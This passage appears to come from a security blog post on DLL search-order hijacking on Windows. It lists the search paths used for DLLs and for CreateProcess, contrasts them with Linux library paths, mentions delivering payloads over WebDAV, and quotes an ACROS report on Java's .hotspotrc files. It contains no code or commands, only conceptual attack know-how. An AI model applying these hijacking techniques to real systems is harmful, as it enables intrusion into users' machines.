5. The current directory.
6. The directories that are listed in the PATH environment variable. Note that this does not include the per-application path specified by the App Paths registry key. The App Paths key is not used when computing the DLL search path.

Of course, different functions have different search paths. Take a look at some more interesting example issues:

CreateProcess*, WinExec and LoadModule search paths:
1. The directory from which the application loaded
2. Current working directory
3. etc.

In Windows' case, no one needs to do anything extra like set a problem environment variable, and no developer has to make some stupid mistake. Instead, it's just default behaviour when you load a library without specifying the full path. Again, with Linux, the default search path is going to be local unless otherwise specified at compile time with something like RUNPATH and its $ORIGIN expansion. But even then you're restricted to the trusted search path, which is all local full-path locations. As far as I know, you can't change a default search path to a remote location. But I haven't researched it that much, and this is a field of doing things in ways they shouldn't be done. The interesting part about this type of attack is that the attacker can run a WebDAV server to run the exploit.
This is a normal-looking URL, not some incredibly obvious UNC path to an SMB share. Yes, like most client-side attacks, it may require some social engineering, hijacking of a domain, etc. However, there's more to it than just downloading some random file from a stranger; it can be used in a decent combination by a well-designed attack. A good example is one that ACROS actually reported on (haven't verified myself, so going on their word). Check it out:

The current Oracle Java Runtime Environment <http://www.java.com/en/download/> (version 6, update 26) - just like its previous versions - supports so-called Hotspot configuration files <http://blogs.oracle.com/javawithjiva/entry/hotspotrc_and_hotspot_compiler>, .hotspotrc and .hotspot_compiler. These files are loaded when the Java virtual machine is initialized and can specify (or override) the VM settings that are usually provided as command-line parameters for java.exe, or exclude chosen methods from compilation, respectively.

They then go on to explain:
